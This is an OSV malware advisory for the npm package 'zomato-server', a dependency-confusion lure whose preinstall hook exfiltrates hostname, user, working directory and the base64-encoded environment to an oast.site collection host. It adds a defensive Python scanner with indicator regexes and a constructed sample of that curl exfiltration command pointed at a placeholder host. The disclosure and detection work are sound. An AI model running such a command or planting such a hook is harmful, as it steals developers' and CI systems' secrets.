zomato-server @1.0.0
Vulnerability report · Last retrieved from osv.dev June 23, 2026 at 3:29 AM UTC
OSV ID
MAL-2026-6253
Ecosystem
npm
Summary
The package's package.json declares a preinstall lifecycle hook that runs curl to POST the installer's hostname, whoami, current working directory, and a base64-encoded dump of the full process environment to http://d8s0b82plbq3u5sb2vo0sb3a9obr4yjt7.oast.site over plain HTTP. The destination is an Interactsh-style out-of-band collection subdomain unrelated to any legitimate Zomato infrastructure. This fires automatically on npm install without user consent, leaking any credentials, tokens, or secrets present in environment variables (CI tokens, npm auth, AWS keys, etc.). The package itself ships only a 62-byte stub index.js exporting { name, version } and impersonates the Zomato brand (description 'Zomato server-side utilities', repo pointing at github.com/zomato/zomato-server), consistent with a dependency-confusion lure targeting Zomato internal builds.
Source: amazon-inspector (f0a12373009dd17131e45f4d20570904f2b8074367ee8b121e60a3ce5764fa00)
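A defender-side check for the pattern described in the summary above: an added example, not code from the OSV record or from Amazon Inspector, that parses a package.json and flags npm lifecycle hooks which combine a network client with environment or host data collection. The two package.json inputs, the indicator list and the EXAMPLE-OOB-SUBDOMAIN placeholder are constructed for this example.

```python
import json
import re

# Scripts npm runs automatically during `npm install`, before any code is required.
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Heuristic indicators (constructed for this example); each is (label, regex).
INDICATORS = [
    ("network-client", re.compile(r"\b(curl|wget|nc|ncat)\b|fetch\(|https?\.request")),
    ("env-dump", re.compile(r"\$\(\s*env\b|\benv\s*\||\bprintenv\b|process\.env\b")),
    ("host-recon", re.compile(r"\b(hostname|whoami|pwd)\b")),
    ("encoding", re.compile(r"\bbase64\b|btoa\(")),
    ("plain-http", re.compile(r"http://")),
    ("oob-domain", re.compile(r"\b(oast\.site|oast\.pro|interact\.sh|oastify\.com|burpcollaborator\.net)\b")),
]


def scan_package_json(text):
    """Return [(hook, [indicator labels])] for lifecycle scripts that look like exfiltration."""
    pkg = json.loads(text)
    scripts = pkg.get("scripts") or {}
    findings = []
    for hook in LIFECYCLE_HOOKS:
        cmd = scripts.get(hook)
        if not isinstance(cmd, str):
            continue
        hits = [label for label, rx in INDICATORS if rx.search(cmd)]
        # A lone network call (e.g. a binary download helper) is common and noisy;
        # flag only when it is paired with environment or host data collection.
        if "network-client" in hits and ({"env-dump", "host-recon"} & set(hits)):
            findings.append((hook, hits))
    return findings


# Constructed sample mirroring the reported preinstall hook, with a placeholder OOB host.
SUSPICIOUS_PKG = json.dumps({
    "name": "zomato-server", "version": "1.0.0",
    "scripts": {"preinstall": 'curl -s -X POST -d "$(hostname):$(whoami):$(pwd):$(env | base64)" '
                              'http://EXAMPLE-OOB-SUBDOMAIN.oast.site'},
})
# Constructed benign package: a postinstall build step with no network or env access.
BENIGN_PKG = json.dumps({"name": "ok", "version": "1.0.0",
                         "scripts": {"postinstall": "node scripts/build-native.js", "test": "jest"}})

if __name__ == "__main__":
    for label, pkg in (("suspicious", SUSPICIOUS_PKG), ("benign", BENIGN_PKG)):
        print(label, scan_package_json(pkg))
```

Run it against every package.json in a vendored dependency tree (or the extracted tarball of a new dependency) before `npm install` executes the hooks; `npm install --ignore-scripts` is the blunt alternative while a flagged package is reviewed.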